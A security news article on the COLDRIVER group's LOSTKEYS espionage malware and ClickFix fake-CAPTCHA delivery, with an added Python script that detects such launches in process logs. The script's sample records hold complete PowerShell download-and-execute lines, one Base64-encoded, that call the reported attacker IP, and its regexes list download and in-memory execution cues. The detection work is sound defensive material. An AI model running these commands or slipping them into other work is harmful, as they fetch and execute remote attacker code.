A new cyber threat has emerged from the Russia-linked hacking group COLDRIVER, also known as Callisto, Star Blizzard, or UNC4057. In a shift from its traditional credential-theft tactics, the group is now deploying a custom malware called LOSTKEYS. The attacks are part of a sophisticated espionage campaign aimed at high-profile individuals.
According to the Google Threat Intelligence Group (GTIG), the COLDRIVER LOSTKEYS malware has been seen in action during January, March, and April 2025. Victims include current and former Western military advisors, government personnel, journalists, think tanks, NGOs, and people with ties to Ukraine.
How LOSTKEYS Malware Works
The LOSTKEYS malware is designed to silently harvest sensitive data. Once it infects a system, it scans for specific file types and directories, collecting documents, system details, and a list of active processes. It then sends this data to remote servers controlled by the attackers.
The malware is typically delivered through a social engineering tactic called ClickFix. This method tricks users into thinking they must complete a CAPTCHA. Victims are instructed to open the Windows Run dialog and paste a PowerShell command copied to their clipboard. This command fetches a secondary script from a remote IP address: 165.227.148[.]68.
Before running the final stage, the script checks for signs that it’s inside a virtual machine. These checks are likely used to avoid detection by cybersecurity tools. If the check passes, it downloads and decodes a Base64-encoded PowerShell script, which installs LOSTKEYS on the user’s device.
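The delivery chain described above leaves a recognisable trace in process-creation telemetry: PowerShell launched from the Run dialog host, with a command line that downloads and executes remote content, sometimes wrapped in a Base64 -EncodedCommand. The following is an added detection example, not code from the article, GTIG, or COLDRIVER. The log record format (`key=value|key=value` with Sysmon-style `Image`, `ParentImage`, and `CommandLine` fields), the parent-process list, and the sample log lines are all constructed for illustration; the only value taken from the article is the reported IP address, used here in undefanged form inside the constructed records.

```python
"""Heuristic detection of ClickFix-style PowerShell launches in process-creation logs.

Added example, not part of the original article. Record format, field names and
sample lines are constructed assumptions that resemble Sysmon Event ID 1 fields.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# The Windows Run dialog is hosted by explorer.exe, so a PowerShell child of it
# is consistent with a user pasting a command there (assumption for this example).
SUSPECT_PARENTS = {"explorer.exe"}

# Command-line fragments that fetch remote content, execute it in memory, or unwrap Base64.
DOWNLOAD_CUE = re.compile(r"(invoke-webrequest|\biwr\b|downloadstring|net\.webclient|\bcurl\b|\bwget\b)", re.I)
EXEC_CUE = re.compile(r"(\biex\b|invoke-expression)", re.I)
B64_CUE = re.compile(r"frombase64string", re.I)
ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})")


@dataclass
class Finding:
    line_no: int
    reasons: List[str] = field(default_factory=list)
    remote_hosts: List[str] = field(default_factory=list)
    decoded: Optional[str] = None


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand argument (Base64 of UTF-16LE text), if present."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_line(line: str) -> dict:
    """Parse a 'key=value|key=value' record (constructed format for this example)."""
    return dict(kv.split("=", 1) for kv in line.strip().split("|") if "=" in kv)


def analyze(lines: List[str]) -> List[Finding]:
    """Return findings for PowerShell launches that match at least two ClickFix cues."""
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        image = rec.get("Image", "").lower()
        parent = rec.get("ParentImage", "").lower()
        cmd = rec.get("CommandLine", "")
        if not image.endswith(("powershell.exe", "pwsh.exe")):
            continue
        f = Finding(line_no=n)
        if parent.split("\\")[-1] in SUSPECT_PARENTS:
            f.reasons.append("powershell spawned from Run dialog host")
        text = cmd
        f.decoded = decode_encoded_command(cmd)
        if f.decoded:
            f.reasons.append("base64 -EncodedCommand payload")
            text = cmd + " " + f.decoded  # inspect the decoded stage as well
        if DOWNLOAD_CUE.search(text):
            f.reasons.append("remote download")
        if EXEC_CUE.search(text):
            f.reasons.append("in-memory execution (IEX)")
        if B64_CUE.search(text):
            f.reasons.append("base64 decoding of a later stage")
        f.remote_hosts = IP_URL.findall(text)
        # Requiring two cues keeps ordinary administrative scripts out of the results.
        if len(f.reasons) >= 2:
            findings.append(f)
    return findings


# Constructed sample records. The second one hides its payload behind -EncodedCommand,
# built here so the Base64 is guaranteed to be valid UTF-16LE.
_ENC = base64.b64encode("IEX (iwr http://165.227.148.68/stage2).Content".encode("utf-16-le")).decode()
SAMPLE_LOGS = [
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=powershell -w hidden -c \"iex (New-Object Net.WebClient).DownloadString('http://165.227.148.68/stage2')\"",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=powershell -nop -w hidden -enc " + _ENC,
    # Benign: a scheduled maintenance script started by the task scheduler host.
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Windows\\System32\\svchost.exe|"
    "CommandLine=powershell -File C:\\Scripts\\cleanup.ps1",
]

if __name__ == "__main__":
    for hit in analyze(SAMPLE_LOGS):
        print(f"record {hit.line_no}: {', '.join(hit.reasons)}; hosts={hit.remote_hosts}")
        if hit.decoded:
            print("  decoded stage:", hit.decoded)
```

Decoding the `-EncodedCommand` argument before matching is what makes the second record visible; without it the command line carries none of the download or execution keywords. The two-cue threshold is a tuning choice, and in a real environment the parent-process list and the keyword sets would be adjusted to the organisation's own baseline of legitimate PowerShell use.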
More Than Just Credential Theft
Security researcher Wesley Shields explains that COLDRIVER is well-known for stealing login credentials and then accessing emails and contact lists. However, this new wave of attacks shows the group is evolving. LOSTKEYS is now the second known malware used by COLDRIVER, following a previous tool called SPICA.
Like SPICA, LOSTKEYS appears to be used in highly targeted operations. It’s not being deployed on a massive scale, but rather against selected victims with valuable information. This suggests the group is focusing on quality over quantity.
Further analysis from Google shows that earlier versions of LOSTKEYS may have existed as far back as December 2023, disguised as software linked to the Maltego open-source investigation platform. Whether these samples are linked to COLDRIVER is still unclear.
The ClickFix social engineering method is becoming increasingly popular. It has been adopted by other cybercriminals to spread a range of malware, including a banking trojan called Lampion and the macOS-based Atomic Stealer.
Palo Alto Networks Unit 42 has tracked Lampion infections using phishing emails. These messages contain ZIP files with HTML pages that guide users through the ClickFix steps. Once again, users are tricked into pasting harmful code into their systems.
Lampion’s infection process is broken into multiple, scattered steps. Each runs as a separate process, making it harder for antivirus tools to detect the full attack chain.
Meanwhile, Atomic Stealer is being distributed through a combined technique called EtherHiding. This method uses Binance Smart Chain (BSC) contracts to hide malicious commands. When users click “I’m not a robot” on a fake CAPTCHA, a hidden script runs and installs the stealer on macOS.
Large-Scale Watering Hole Attack Detected
An independent researcher known as Badbyte discovered that nearly 2,800 legitimate websites have been hijacked to host these fake CAPTCHA pages. The large campaign, named MacReaper, uses full-screen iframes, obfuscated JavaScript, and blockchain tech to avoid detection.
As cyber threats evolve, COLDRIVER LOSTKEYS malware shows how advanced and targeted modern espionage attacks have become. Organizations and individuals must stay alert and adopt strong cybersecurity practices.